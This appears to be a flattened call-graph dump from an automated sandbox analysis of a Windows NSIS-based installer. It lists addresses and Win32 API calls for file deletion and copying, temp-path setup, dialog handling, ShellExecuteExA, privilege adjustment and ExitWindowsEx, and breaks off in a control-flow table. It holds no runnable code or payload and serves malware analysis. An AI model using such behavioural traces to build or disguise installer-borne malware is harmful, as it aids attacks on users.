402a9f 17 API calls 4373->4374 4375 401c0b 4374->4375 4376 402a9f 17 API calls 4375->4376 4377 401c18 4376->4377 4379 401c2d 4377->4379 4380 402ac1 17 API calls 4377->4380 4378 401c3d 4382 401c94 4378->4382 4383 401c48 4378->4383 4379->4378 4381 402ac1 17 API calls 4379->4381 4380->4379 4381->4378 4385 402ac1 17 API calls 4382->4385 4384 402a9f 17 API calls 4383->4384 4386 401c4d 4384->4386 4387 401c99 4385->4387 4388 402a9f 17 API calls 4386->4388 4389 402ac1 17 API calls 4387->4389 4390 401c59 4388->4390 4391 401ca2 FindWindowExA 4389->4391 4392 401c84 SendMessageA 4390->4392 4393 401c66 SendMessageTimeoutA 4390->4393 4394 401cc0 4391->4394 4392->4394 4393->4394 4402 401490 4403 405056 24 API calls 4402->4403 4404 401497 4403->4404 3057 405611 ShellExecuteExA 3250 405194 3251 4051b6 GetDlgItem GetDlgItem GetDlgItem 3250->3251 3252 40533f 3250->3252 3295 404025 SendMessageA 3251->3295 3254 405347 GetDlgItem CreateThread CloseHandle 3252->3254 3255 40536f 3252->3255 3254->3255 3318 405128 OleInitialize 3254->3318 3256 40539d 3255->3256 3258 405385 ShowWindow ShowWindow 3255->3258 3259 4053be 3255->3259 3260 4053f8 3256->3260 3263 4053d1 ShowWindow 3256->3263 3264 4053ad 3256->3264 3257 405226 3261 40522d GetClientRect GetSystemMetrics SendMessageA SendMessageA 3257->3261 3300 404025 SendMessageA 3258->3300 3304 404057 3259->3304 3260->3259 3268 405405 SendMessageA 3260->3268 3266 40529b 3261->3266 3267 40527f SendMessageA SendMessageA 3261->3267 3270 4053f1 3263->3270 3271 4053e3 3263->3271 3301 403fc9 3264->3301 3272 4052a0 SendMessageA 3266->3272 3273 4052ae 3266->3273 3267->3266 3274 4053ca 3268->3274 3275 40541e CreatePopupMenu 3268->3275 3277 403fc9 SendMessageA 3270->3277 3276 405056 24 API calls 3271->3276 3272->3273 3296 403ff0 3273->3296 3278 405f51 17 API calls 3275->3278 3276->3270 3277->3260 3280 40542e AppendMenuA 3278->3280 3282 40544c GetWindowRect 3280->3282 3283 40545f TrackPopupMenu 3280->3283 3281 4052be 3284 4052c7 ShowWindow 3281->3284 3285 4052fb GetDlgItem SendMessageA 3281->3285 3282->3283 3283->3274 3286 40547b 3283->3286 3287 4052ea 3284->3287 3288 4052dd ShowWindow 3284->3288 3285->3274 3289 405322 SendMessageA SendMessageA 3285->3289 3290 40549a SendMessageA 3286->3290 3299 404025 SendMessageA 3287->3299 3288->3287 3289->3274 3290->3290 3291 4054b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3290->3291 3293 4054d9 SendMessageA 3291->3293 3293->3293 3294 4054fb GlobalUnlock SetClipboardData CloseClipboard 3293->3294 3294->3274 3295->3257 3297 405f51 17 API calls 3296->3297 3298 403ffb SetDlgItemTextA 3297->3298 3298->3281 3299->3285 3300->3256 3302 403fd0 3301->3302 3303 403fd6 SendMessageA 3301->3303 3302->3303 3303->3259 3305 40406f GetWindowLongA 3304->3305 3315 4040f8 3304->3315 3306 404080 3305->3306 3305->3315 3307 404092 3306->3307 3308 40408f GetSysColor 3306->3308 3309 4040a2 SetBkMode 3307->3309 3310 404098 SetTextColor 3307->3310 3308->3307 3311 4040c0 3309->3311 3312 4040ba GetSysColor 3309->3312 3310->3309 3313 4040d1 3311->3313 3314 4040c7 SetBkColor 3311->3314 3312->3311 3313->3315 3316 4040e4 DeleteObject 3313->3316 3317 4040eb CreateBrushIndirect 3313->3317 3314->3313 3315->3274 3316->3317 3317->3315 3325 40403c 3318->3325 3320 40514b 3324 405172 3320->3324 3328 401389 3320->3328 3321 40403c SendMessageA 3322 405184 OleUninitialize 3321->3322 3324->3321 3326 404054 3325->3326 3327 404045 SendMessageA 3325->3327 3326->3320 3327->3326 3330 401390 3328->3330 3329 4013fe 3329->3320 3330->3329 3331 4013cb MulDiv SendMessageA 3330->3331 3331->3330 4405 401d95 GetDC 4406 402a9f 17 API calls 4405->4406 4407 401da7 GetDeviceCaps MulDiv ReleaseDC 4406->4407 4408 402a9f 17 API calls 4407->4408 4409 401dd8 4408->4409 4410 405f51 17 API calls 4409->4410 4411 401e15 CreateFontIndirectA 4410->4411 4412 402577 4411->4412 4413 404419 4414 404429 4413->4414 4415 40444f 4413->4415 4416 403ff0 18 API calls 4414->4416 4417 404057 8 API calls 4415->4417 4418 404436 SetDlgItemTextA 4416->4418 4419 40445b 4417->4419 4418->4415 4420 401d1a 4421 402a9f 17 API calls 4420->4421 4422 401d28 SetWindowLongA 4421->4422 4423 402951 4422->4423 3726 403b1c 3727 403b34 3726->3727 3728 403c6f 3726->3728 3727->3728 3729 403b40 3727->3729 3730 403c80 GetDlgItem GetDlgItem 3728->3730 3731 403cc0 3728->3731 3733 403b4b SetWindowPos 3729->3733 3734 403b5e 3729->3734 3735 403ff0 18 API calls 3730->3735 3732 403d1a 3731->3732 3743 401389 2 API calls 3731->3743 3737 40403c SendMessageA 3732->3737 3758 403c6a 3732->3758 3733->3734 3738 403b63 ShowWindow 3734->3738 3739 403b7b 3734->3739 3736 403caa SetClassLongA 3735->3736 3740 40140b 2 API calls 3736->3740 3769 403d2c 3737->3769 3738->3739 3741 403b83 DestroyWindow 3739->3741 3742 403b9d 3739->3742 3740->3731 3796 403f79 3741->3796 3744 403ba2 SetWindowLongA 3742->3744 3745 403bb3 3742->3745 3746 403cf2 3743->3746 3744->3758 3748 403c5c 3745->3748 3749 403bbf GetDlgItem 3745->3749 3746->3732 3750 403cf6 SendMessageA 3746->3750 3747 403f7b DestroyWindow EndDialog 3747->3796 3755 404057 8 API calls 3748->3755 3753 403bd2 SendMessageA IsWindowEnabled 3749->3753 3754 403bef 3749->3754 3750->3758 3751 40140b 2 API calls 3751->3769 3752 403faa ShowWindow 3752->3758 3753->3754 3753->3758 3757 403bf4 3754->3757 3759 403bfc 3754->3759 3761 403c43 SendMessageA 3754->3761 3762 403c0f 3754->3762 3755->3758 3756 405f51 17 API calls 3756->3769 3760 403fc9 SendMessageA 3757->3760 3759->3757 3759->3761 3763 403c2a 3760->3763 3761->3748 3764 403c17 3762->3764 3765 403c2c 3762->3765 3763->3748 3768 40140b 2 API calls 3764->3768 3767 40140b 2 API calls 3765->3767 3766 403ff0 18 API calls 3766->3769 3770 403c33 3767->3770 3768->3757 3769->3747 3769->3751 3769->3756 3769->3758 3769->3766 3771 403ff0 18 API calls 3769->3771 3787 403ebb DestroyWindow 3769->3787 3770->3748 3770->3757 3772 403da7 GetDlgItem 3771->3772 3773 403dc4 ShowWindow KiUserCallbackDispatcher 3772->3773 3774 403dbc 3772->3774 3797 404012 KiUserCallbackDispatcher 3773->3797 3774->3773 3776 403dee EnableWindow 3781 403e02 3776->3781 3777 403e07 GetSystemMenu EnableMenuItem SendMessageA 3778 403e37 SendMessageA 3777->3778 3777->3781 3778->3781 3780 403afd 18 API calls 3780->3781 3781->3777 3781->3780 3798 404025 SendMessageA 3781->3798 3799 405f2f lstrcpynA 3781->3799 3783 403e66 lstrlenA 3784 405f51 17 API calls 3783->3784 3785 403e77 SetWindowTextA 3784->3785 3786 401389 2 API calls 3785->3786 3786->3769 3788 403ed5 CreateDialogParamA 3787->3788 3787->3796 3789 403f08 3788->3789 3788->3796 3790 403ff0 18 API calls 3789->3790 3791 403f13 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3790->3791 3792 401389 2 API calls 3791->3792 3793 403f59 3792->3793 3793->3758 3794 403f61 ShowWindow 3793->3794 3795 40403c SendMessageA 3794->3795 3795->3796 3796->3752 3796->3758 3797->3776 3798->3781 3799->3783 3841 40159d 3842 402ac1 17 API calls 3841->3842 3843 4015a4 SetFileAttributesA 3842->3843 3844 4015b6 3843->3844 4429 40149d 4430 4022e1 4429->4430 4431 4014ab PostQuitMessage 4429->4431 4431->4430 4432 401a1e 4433 402ac1 17 API calls 4432->4433 4434 401a27 ExpandEnvironmentStringsA 4433->4434 4435 401a3b 4434->4435 4437 401a4e 4434->4437 4436 401a40 lstrcmpA 4435->4436 4435->4437 4436->4437 4438 40171f 4439 402ac1 17 API calls 4438->4439 4440 401726 SearchPathA 4439->4440 4441 401741 4440->4441 4449 401e25 4450 402a9f 17 API calls 4449->4450 4451 401e2b 4450->4451 4452 402a9f 17 API calls 4451->4452 4453 401e37 4452->4453 4454 401e43 ShowWindow 4453->4454 4455 401e4e EnableWindow 4453->4455 4456 402951 4454->4456 4455->4456 4457 401f2b 4458 402ac1 17 API calls 4457->4458 4459 401f32 4458->4459 4460 406232 2 API calls 4459->4460 4461 401f38 4460->4461 4463 401f4a 4461->4463 4464 405e8d wsprintfA 4461->4464 4464->4463 4472 4047b1 4473 4047c1 4472->4473 4474 4047dd 4472->4474 4483 40562f GetDlgItemTextA 4473->4483 4476 404810 4474->4476 4477 4047e3 SHGetPathFromIDListA 4474->4477 4479 4047f3 4477->4479 4482 4047fa SendMessageA 4477->4482 4478 4047ce SendMessageA 4478->4474 4481 40140b 2 API calls 4479->4481 4481->4482 4482->4476 4483->4478 3058 401932 3059 401934 3058->3059 3064 402ac1 3059->3064 3065 402acd 3064->3065 3111 405f51 3065->3111 3068 401939 3070 4056f7 3068->3070 3153 4059b5 3070->3153 3073 405736 3076 40586e 3073->3076 3167 405f2f lstrcpynA 3073->3167 3074 40571f DeleteFileA 3075 401942 3074->3075 3076->3075 3196 406232 FindFirstFileA 3076->3196 3078 40575c 3079 405762 lstrcatA 3078->3079 3080 40576f 3078->3080 3082 405775 3079->3082 3168 40590e lstrlenA 3080->3168 3085 405783 lstrcatA 3082->3085 3086 40577a 3082->3086 3087 40578e lstrlenA FindFirstFileA 3085->3087 3086->3085 3086->3087 3089 405864 3087->3089 3109 4057b2 3087->3109 3088 40588c 3199 4058c7 lstrlenA CharPrevA 3088->3199 3089->3076 3091 4058f2 CharNextA 3091->3109 3093 4056af 5 API calls 3094 40589e 3093->3094 3095 4058a2 3094->3095 3096 4058b8 3094->3096 3095->3075 3101 405056 24 API calls 3095->3101 3097 405056 24 API calls 3096->3097 3097->3075 3098 405843 FindNextFileA 3100 40585b FindClose 3098->3100 3098->3109 3100->3089 3102 4058af 3101->3102 3103 405d0e 36 API calls 3102->3103 3105 4058b6 3103->3105 3105->3075 3106 4056f7 60 API calls 3106->3109 3107 405056 24 API calls 3107->3098 3109->3091 3109->3098 3109->3106 3109->3107 3172 405f2f lstrcpynA 3109->3172 3173 4056af 3109->3173 3181 405056 3109->3181 3192 405d0e MoveFileExA 3109->3192 3115 405f5e 3111->3115 3112 406180 3113 402aee 3112->3113 3144 405f2f lstrcpynA 3112->3144 3113->3068 3128 406199 3113->3128 3115->3112 3116 40615a lstrlenA 3115->3116 3117 405f51 10 API calls 3115->3117 3120 406076 GetSystemDirectoryA 3115->3120 3122 406089 GetWindowsDirectoryA 3115->3122 3123 406199 5 API calls 3115->3123 3124 405f51 10 API calls 3115->3124 3125 406103 lstrcatA 3115->3125 3126 4060bd SHGetSpecialFolderLocation 3115->3126 3137 405e16 3115->3137 3142 405e8d wsprintfA 3115->3142 3143 405f2f lstrcpynA 3115->3143 3116->3115 3117->3116 3120->3115 3122->3115 3123->3115 3124->3115 3125->3115 3126->3115 3127 4060d5 SHGetPathFromIDListA CoTaskMemFree 3126->3127 3127->3115 3134 4061a5 3128->3134 3129 40620d 3130 406211 CharPrevA 3129->3130 3132 40622c 3129->3132 3130->3129 3131 406202 CharNextA 3131->3129 3131->3134 3132->3068 3134->3129 3134->3131 3135 4061f0 CharNextA 3134->3135 3136 4061fd CharNextA 3134->3136 3149 4058f2 3134->3149 3135->3134 3136->3131 3145 405db5 3137->3145 3140 405e79 3140->3115 3141 405e4a RegQueryValueExA RegCloseKey 3141->3140 3142->3115 3143->3115 3144->3113 3146 405dc4 3145->3146 3147 405dcd RegOpenKeyExA 3146->3147 3148 405dc8 3146->3148 3147->3148 3148->3140 3148->3141 3150 4058f8 3149->3150 3151 40590b 3150->3151 3152 4058fe CharNextA 3150->3152 3151->3134 3152->3150 3202 405f2f lstrcpynA 3153->3202 3155 4059c6 3203 405960 CharNextA CharNextA 3155->3203 3158 405717 3158->3073 3158->3074 3159 406199 5 API calls 3165 4059dc 3159->3165 3160 405a07 lstrlenA 3161 405a12 3160->3161 3160->3165 3162 4058c7 3 API calls 3161->3162 3164 405a17 GetFileAttributesA 3162->3164 3163 406232 2 API calls 3163->3165 3164->3158 3165->3158 3165->3160 3165->3163 3166 40590e 2 API calls 3165->3166 3166->3160 3167->3078 3169 40591b 3168->3169 3170 405920 CharPrevA 3169->3170 3171 40592c 3169->3171 3170->3169 3170->3171 3171->3082 3172->3109 3209 405aa3 GetFileAttributesA 3173->3209 3176 4056d2 DeleteFileA 3179 4056d8 3176->3179 3177 4056ca RemoveDirectoryA 3177->3179 3178 4056dc 3178->3109 3179->3178 3180 4056e8 SetFileAttributesA 3179->3180 3180->3178 3182 405071 3181->3182 3191 405114 3181->3191 3183 40508e lstrlenA 3182->3183 3184 405f51 17 API calls 3182->3184 3185 4050b7 3183->3185 3186 40509c lstrlenA 3183->3186 3184->3183 3188 4050ca 3185->3188 3189 4050bd SetWindowTextA 3185->3189 3187 4050ae lstrcatA 3186->3187 3186->3191 3187->3185 3190 4050d0 SendMessageA SendMessageA SendMessageA 3188->3190 3188->3191 3189->3188 3190->3191 3191->3109 3193 405d2f 3192->3193 3194 405d22 3192->3194 3193->3109 3212 405b9e 3194->3212 3197 406248 FindClose 3196->3197 3198 405888 3196->3198 3197->3198 3198->3075 3198->3088 3200 4058e1 lstrcatA 3199->3200 3201 405892 3199->3201 3200->3201 3201->3093 3202->3155 3204 40598b 3203->3204 3205 40597b 3203->3205 3207 4058f2 CharNextA 3204->3207 3208 4059ab 3204->3208 3205->3204 3206 405986 CharNextA 3205->3206 3206->3208 3207->3204 3208->3158 3208->3159 3210 4056bb 3209->3210 3211 405ab5 SetFileAttributesA 3209->3211 3210->3176 3210->3177 3210->3178 3211->3210 3213 405bc4 3212->3213 3214 405bea GetShortPathNameA 3212->3214 3239 405ac8 GetFileAttributesA CreateFileA 3213->3239 3216 405d09 3214->3216 3217 405bff 3214->3217 3216->3193 3217->3216 3219 405c07 wsprintfA 3217->3219 3218 405bce CloseHandle GetShortPathNameA 3218->3216 3220 405be2 3218->3220 3221 405f51 17 API calls 3219->3221 3220->3214 3220->3216 3222 405c2f 3221->3222 3240 405ac8 GetFileAttributesA CreateFileA 3222->3240 3224 405c3c 3224->3216 3225 405c4b GetFileSize GlobalAlloc 3224->3225 3226 405d02 CloseHandle 3225->3226 3227 405c6d 3225->3227 3226->3216 3241 405b40 ReadFile 3227->3241 3232 405ca0 3234 405a2d 4 API calls 3232->3234 3233 405c8c lstrcpyA 3235 405cae 3233->3235 3234->3235 3236 405ce5 SetFilePointer 3235->3236 3248 405b6f WriteFile 3236->3248 3239->3218 3240->3224 3242 405b5e 3241->3242 3242->3226 3243 405a2d lstrlenA 3242->3243 3244 405a6e lstrlenA 3243->3244 3245 405a76 3244->3245 3246 405a47 lstrcmpiA 3244->3246 3245->3232 3245->3233 3246->3245 3247 405a65 CharNextA 3246->3247 3247->3244 3249 405b8d GlobalFree 3248->3249 3249->3226 4484 4026b4 4485 4026ba 4484->4485 4486 402951 4485->4486 4487 4026c2 FindClose 4485->4487 4487->4486 4488 4014b7 4489 4014bd 4488->4489 4490 401389 2 API calls 4489->4490 4491 4014c5 4490->4491 4492 404139 4493 40414f 4492->4493 4501 40425b 4492->4501 4497 403ff0 18 API calls 4493->4497 4494 4042ca 4495 404394 4494->4495 4496 4042d4 GetDlgItem 4494->4496 4503 404057 8 API calls 4495->4503 4499 404352 4496->4499 4500 4042ea 4496->4500 4498 4041a5 4497->4498 4502 403ff0 18 API calls 4498->4502 4499->4495 4508 404364 4499->4508 4500->4499 4507 404310 SendMessageA LoadCursorA SetCursor 4500->4507 4501->4494 4501->4495 4504 40429f GetDlgItem SendMessageA 4501->4504 4505 4041b2 CheckDlgButton 4502->4505 4506 40438f 4503->4506 4525 404012 KiUserCallbackDispatcher 4504->4525 4523 404012 KiUserCallbackDispatcher 4505->4523 4526 4043dd 4507->4526 4512 40436a SendMessageA 4508->4512 4513 40437b 4508->4513 4512->4513 4513->4506 4518 404381 SendMessageA 4513->4518 4514 4042c5 4515 4043b9 SendMessageA 4514->4515 4515->4494 4516 4041d0 GetDlgItem 4524 404025 SendMessageA 4516->4524 4518->4506 4520 4041e6 SendMessageA 4521 404204 GetSysColor 4520->4521 4522 40420d SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4520->4522 4521->4522 4522->4506 4523->4516 4524->4520 4525->4514 4529 405611 ShellExecuteExA 4526->4529 4528 404343 LoadCursorA SetCursor 4528->4499 4529->4528 4530 401b39 4531 402ac1 17 API calls 4530->4531 4532 401b40 4531->4532 4533 402a9f 17 API calls 4532->4533 4534 401b49 wsprintfA 4533->4534 4535 402951 4534->4535 4536 40233a 4537 402ac1 17 API calls 4536->4537 4538 40234b 4537->4538 4539 402ac1 17 API calls 4538->4539 4540 402354 4539->4540 4541 402ac1 17 API calls 4540->4541 4542 40235e GetPrivateProfileStringA 4541->4542 4543 4028ba 4544 4028c2 4543->4544 4545 402900 4544->4545 4546 402716 4544->4546 4548 4028dd 4544->4548 4545->4546 4547 405f51 17 API calls 4545->4547 4547->4546 4548->4546 4550 405e8d wsprintfA 4548->4550 4550->4546 3447 4015bb 3448 402ac1 17 API calls 3447->3448 3449 4015c2 3448->3449 3450 405960 4 API calls 3449->3450 3463 4015ca 3450->3463 3451 401624 3453 401652 3451->3453 3454 401629 3451->3454 3452 4058f2 CharNextA 3452->3463 3456 401423 24 API calls 3453->3456 3474 401423 3454->3474 3462 40164a 3456->3462 3461 40163b SetCurrentDirectoryA 3461->3462 3463->3451 3463->3452 3464 40160c GetFileAttributesA 3463->3464 3466 4055b6 3463->3466 3469 40551c CreateDirectoryA 3463->3469 3478 405599 CreateDirectoryA 3463->3478 3464->3463 3481 4062c7 GetModuleHandleA 3466->3481 3470 40556d GetLastError 3469->3470 3471 405569 3469->3471 3470->3471 3472 40557c SetFileSecurityA 3470->3472 3471->3463 3472->3471 3473 405592 GetLastError 3472->3473 3473->3471 3475 405056 24 API calls 3474->3475 3476 401431 3475->3476 3477 405f2f lstrcpynA 3476->3477 3477->3461 3479 4055a9 3478->3479 3480 4055ad GetLastError 3478->3480 3479->3463 3480->3479 3482 4062e3 3481->3482 3483 4062ed GetProcAddress 3481->3483 3487 406259 GetSystemDirectoryA 3482->3487 3485 4055bd 3483->3485 3485->3463 3486 4062e9 3486->3483 3486->3485 3488 40627b wsprintfA LoadLibraryExA 3487->3488 3488->3486 3490 4031bb SetErrorMode GetVersion 3491 4031fc 3490->3491 3492 403202 3490->3492 3493 4062c7 5 API calls 3491->3493 3494 406259 3 API calls 3492->3494 3493->3492 3495 403218 lstrlenA 3494->3495 3495->3492 3496 403227 3495->3496 3497 4062c7 5 API calls 3496->3497 3498 40322e 3497->3498 3499 4062c7 5 API calls 3498->3499 3500 403235 3499->3500 3501 4062c7 5 API calls 3500->3501 3502 403241 #17 OleInitialize SHGetFileInfoA 3501->3502 3581 405f2f lstrcpynA 3502->3581 3505 40328d GetCommandLineA 3582 405f2f lstrcpynA 3505->3582 3507 40329f GetModuleHandleA 3508 4032b6 3507->3508 3509 4058f2 CharNextA 3508->3509 3510 4032ca CharNextA 3509->3510 3519 4032da 3510->3519 3511 4033a4 3512 4033b7 GetTempPathA 3511->3512 3583 40318a 3512->3583 3514 4033cf 3515 4033d3 GetWindowsDirectoryA lstrcatA 3514->3515 3516 403429 DeleteFileA 3514->3516 3518 40318a 12 API calls 3515->3518 3593 402d48 GetTickCount GetModuleFileNameA 3516->3593 3517 4058f2 CharNextA 3517->3519 3521 4033ef 3518->3521 3519->3511 3519->3517 3522 4033a6 3519->3522 3521->3516 3524 4033f3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3521->3524 3677 405f2f lstrcpynA 3522->3677 3523 40343d 3525 4034d3 3523->3525 3528 4034c3 3523->3528 3532 4058f2 CharNextA 3523->3532 3527 40318a 12 API calls 3524->3527 3680 4036a5 3525->3680 3530 403421 3527->3530 3621 40377f 3528->3621 3530->3516 3530->3525 3536 403458 3532->3536 3534 40360b 3538 403613 GetCurrentProcess OpenProcessToken 3534->3538 3539 40368d ExitProcess 3534->3539 3535 4034ed 3537 40564b MessageBoxIndirectA 3535->3537 3542 403503 3536->3542 3543 40349e 3536->3543 3541 4034fb ExitProcess 3537->3541 3544 40365e 3538->3544 3545 40362e LookupPrivilegeValueA AdjustTokenPrivileges 3538->3545 3547 4055b6 5 API calls 3542->3547 3546 4059b5 18 API calls 3543->3546 3548 4062c7 5 API calls 3544->3548 3545->3544 3549 4034a9 3546->3549 3550 403508 lstrcatA 3547->3550 3551 403665 3548->3551 3549->3525 3678 405f2f lstrcpynA 3549->3678 3552 403524 lstrcatA lstrcmpiA 3550->3552 3553 403519 lstrcatA 3550->3553 3554 40367a ExitWindowsEx 3551->3554 3557 403686 3551->3557 3552->3525 3556 403540 3552->3556 3553->3552 3554->3539 3554->3557 3559 403545 3556->3559 3560 40354c 3556->3560 3689 40140b 3557->3689 3558 4034b8 3679 405f2f lstrcpynA 3558->3679 3563 40551c 4 API calls 3559->3563 3564 405599 2 API calls 3560->3564 3565 40354a 3563->3565 3566 403551 SetCurrentDirectoryA 3564->3566 3565->3566 3567 403560 3566->3567 3568 40356b 3566->3568 3687 405f2f lstrcpynA 3567->3687 3688 405f2f lstrcpynA 3568->3688 3571 405f51 17 API calls 3572 4035aa DeleteFileA 3571->3572 3573 4035b7 CopyFileA 3572->3573 3578 403579 3572->3578 3573->3578 3574 4035ff 3575 405d0e 36 API calls 3574->3575 3575->3525 3576 405d0e 36 API calls 3576->3578 3577 405f51 17 API calls 3577->3578 3578->3571 3578->3574 3578->3576 3578->3577 3579 4055ce 2 API calls 3578->3579 3580 4035eb CloseHandle 3578->3580 3579->3578 3580->3578 3581->3505 3582->3507 3584 406199 5 API calls 3583->3584 3586 403196 3584->3586 3585 4031a0 3585->3514 3586->3585 3587 4058c7 3 API calls 3586->3587 3588 4031a8 3587->3588 3589 405599 2 API calls 3588->3589 3590 4031ae 3589->3590 3591 405af7 2 API calls 3590->3591 3592 4031b9 3591->3592 3592->3514 3692 405ac8 GetFileAttributesA CreateFileA 3593->3692 3595 402d88 3616 402d98 3595->3616 3693 405f2f lstrcpynA 3595->3693 3597 402dae 3598 40590e 2 API calls 3597->3598 3599 402db4 3598->3599 3694 405f2f lstrcpynA 3599->3694 3601 402dbf GetFileSize 3602 402dd6 3601->3602 3603 402ebb 3601->3603 3602->3603 3606 40315d ReadFile 3602->3606 3608 402f27 3602->3608 3602->3616 3617 402ce4 6 API calls 3602->3617 3695 402ce4 3603->3695 3605 402ec4 3607 402ef4 GlobalAlloc 3605->3607 3605->3616 3707 403173 SetFilePointer 3605->3707 3606->3602 3706 403173 SetFilePointer 3607->3706 3612 402ce4 6 API calls 3608->3612 3611 402f0f 3615 402f81 35 API calls 3611->3615 3612->3616 3613 402edd 3614 40315d ReadFile 3613->3614 3618 402ee8 3614->3618 3619 402f1b 3615->3619 3616->3523 3617->3602 3618->3607 3618->3616 3619->3616 3620 402f58 SetFilePointer 3619->3620 3620->3616 3622 4062c7 5 API calls 3621->3622 3623 403793 3622->3623 3624 403799 3623->3624 3625 4037ab 3623->3625 3716 405e8d wsprintfA 3624->3716 3626 405e16 3 API calls 3625->3626 3627 4037d6 3626->3627 3629 4037f4 lstrcatA 3627->3629 3631 405e16 3 API calls 3627->3631 3630 4037a9 3629->3630 3708 403a44 3630->3708 3631->3629 3634 4059b5 18 API calls 3635 403826 3634->3635 3636 4038af 3635->3636 3638 405e16 3 API calls 3635->3638 3637 4059b5 18 API calls 3636->3637 3639 4038b5 3637->3639 3640 403852 3638->3640 3641 4038c5 LoadImageA 3639->3641 3642 405f51 17 API calls 3639->3642 3640->3636 3645 40386e lstrlenA 3640->3645 3648 4058f2 CharNextA 3640->3648 3643 40396b 3641->3643 3644 4038ec RegisterClassA 3641->3644 3642->3641 3647 40140b 2 API calls 3643->3647 3646 403922 SystemParametersInfoA CreateWindowExA 3644->3646 3676 403975 3644->3676 3649 4038a2 3645->3649 3650 40387c lstrcmpiA 3645->3650 3646->3643 3651 403971 3647->3651 3652 40386c 3648->3652 3654 4058c7 3 API calls 3649->3654 3650->3649 3653 40388c GetFileAttributesA 3650->3653 3656 403a44 18 API calls 3651->3656 3651->3676 3652->3645 3655 403898 3653->3655 3657 4038a8 3654->3657 3655->3649 3659 40590e 2 API calls 3655->3659 3660 403982 3656->3660 3717 405f2f lstrcpynA 3657->3717 3659->3649 3661 403a11 3660->3661 3662 40398e ShowWindow 3660->3662 3664 405128 5 API calls 3661->3664 3663 406259 3 API calls 3662->3663 3665 4039a6 3663->3665 3666 403a17 3664->3666 3667 4039b4 GetClassInfoA 3665->3667 3670 406259 3 API calls 3665->3670 3668 403a33 3666->3668 3669 403a1b 3666->3669 3672 4039c8 GetClassInfoA RegisterClassA 3667->3672 3673 4039de DialogBoxParamA 3667->3673 3671 40140b 2 API calls 3668->3671 3674 40140b 2 API calls 3669->3674 3669->3676 3670->3667 3671->3676 3672->3673 3675 40140b 2 API calls 3673->3675 3674->3676 3675->3676 3676->3525 3677->3512 3678->3558 3679->3528 3681 4036bd 3680->3681 3682 4036af CloseHandle 3680->3682 3722 4036ea 3681->3722 3682->3681 3685 4056f7 67 API calls 3686 4034dc OleUninitialize 3685->3686 3686->3534 3686->3535 3687->3568 3688->3578 3690 401389 2 API calls 3689->3690 3691 401420 3690->3691 3691->3539 3692->3595 3693->3597 3694->3601 3696 402d05 3695->3696 3697 402ced 3695->3697 3700 402d15 GetTickCount 3696->3700 3701 402d0d 3696->3701 3698 402cf6 DestroyWindow 3697->3698 3699 402cfd 3697->3699 3698->3699 3699->3605 3702 402d23 CreateDialogParamA ShowWindow 3700->3702 3703 402d46 3700->3703 3704 406303 2 API calls 3701->3704 3702->3703 3703->3605 3705 402d13 3704->3705 3705->3605 3706->3611 3707->3613 3709 403a58 3708->3709 3718 405e8d wsprintfA 3709->3718 3711 403ac9 3719 403afd 3711->3719 3713 403804 3713->3634 3714 403ace 3714->3713 3715 405f51 17 API calls 3714->3715 3715->3714 3716->3630 3717->3636 3718->3711 3720 405f51 17 API calls 3719->3720 3721 403b0b SetWindowTextA 3720->3721 3721->3714 3723 4036f8 3722->3723 3724 4036c2 3723->3724 3725 4036fd FreeLibrary GlobalFree 3723->3725 3724->3685 3725->3724 3725->3725 4551 401d3b GetDlgItem GetClientRect 4552 402ac1 17 API calls 4551->4552 4553 401d6b LoadImageA SendMessageA 4552->4553 4554 401d89 DeleteObject 4553->4554 4555 402951 4553->4555 4554->4555 4556 4016bb 4557 402ac1 17 API calls 4556->4557 4558 4016c1 GetFullPathNameA 4557->4558 4559 4016f9 4558->4559 4560 4016d8 4558->4560 4561 402951 4559->4561 4562 40170d GetShortPathNameA 4559->4562 4560->4559 4563 406232 2 API calls 4560->4563 4562->4561 4564 4016e9 4563->4564 4564->4559 4566 405f2f lstrcpynA 4564->4566 4566->4559 4567 4065bb 4569 40643f 4567->4569 4568 406daa 4569->4568 4570 4064c0 GlobalFree 4569->4570 4571 4064c9 GlobalAlloc 4569->4571 4572 406540 GlobalAlloc 4569->4572 4573 406537 GlobalFree 4569->4573 4570->4571 4571->4568 4571->4569 4572->4568 4572->4569 4573->4572 4574 40373d 4575 403748 4574->4575 4576 40374f GlobalAlloc 4575->4576 4577 40374c 4575->4577 4576->4577

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4031bb-4031fa SetErrorMode GetVersion 1 4031fc-403204 call 4062c7 0->1 2 40320d 0->2 1->2 8 403206 1->8 3 403212-403225 call 406259 lstrlenA 2->3 9 403227-403243 call 4062c7 * 3 3->9 8->2 16 403254-4032b4 #17 OleInitialize SHGetFileInfoA call 405f2f GetCommandLineA call 405f2f GetModuleHandleA 9->16 17 403245-40324b 9->17 24 4032c0-4032d5 call 4058f2 CharNextA 16->24 25 4032b6-4032bb 16->25 17->16 22 40324d 17->22 22->16 28 40339a-40339e 24->28 25->24 29 4033a4 28->29 30 4032da-4032dd 28->30 33 4033b7-4033d1 GetTempPathA call 40318a 29->33 31 4032e5-4032ed 30->31 32 4032df-4032e3 30->32 34 4032f5-4032f8 31->34 35 4032ef-4032f0 31->35 32->31 32->32 40 4033d3-4033f1 GetWindowsDirectoryA lstrcatA call 40318a 33->40 41 403429-403443 DeleteFileA call 402d48 33->41 38 40338a-403397 call 4058f2 34->38 39 4032fe-403302 34->39 35->34 38->28 57 403399 38->57 43 403304-40330a 39->43 44 40331a-403347 39->44 40->41 58 4033f3-403423 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40318a 40->58 59 4034d7-4034e7 call 4036a5 OleUninitialize 41->59 60 403449-40344f 41->60 50 403310 43->50 51 40330c-40330e 43->51 46 403349-40334f 44->46 47 40335a-403388 44->47 53 403351-403353 46->53 54 403355 46->54 47->38 55 4033a6-4033b2 call 405f2f 47->55 50->44 51->44 51->50 53->47 53->54 54->47 55->33 57->28 58->41 58->59 70 40360b-403611 59->70 71 4034ed-4034fd call 40564b ExitProcess 59->71 63 403451-40345c call 4058f2 60->63 64 4034c7-4034ce call 40377f 60->64 77 403492-40349c 63->77 78 40345e-403487 63->78 72 4034d3 64->72 75 403613-40362c GetCurrentProcess OpenProcessToken 70->75 76 40368d-403695 70->76 72->59 84 40365e-40366c call 4062c7 75->84 85 40362e-403658 LookupPrivilegeValueA AdjustTokenPrivileges 75->85 79 403697 76->79 80 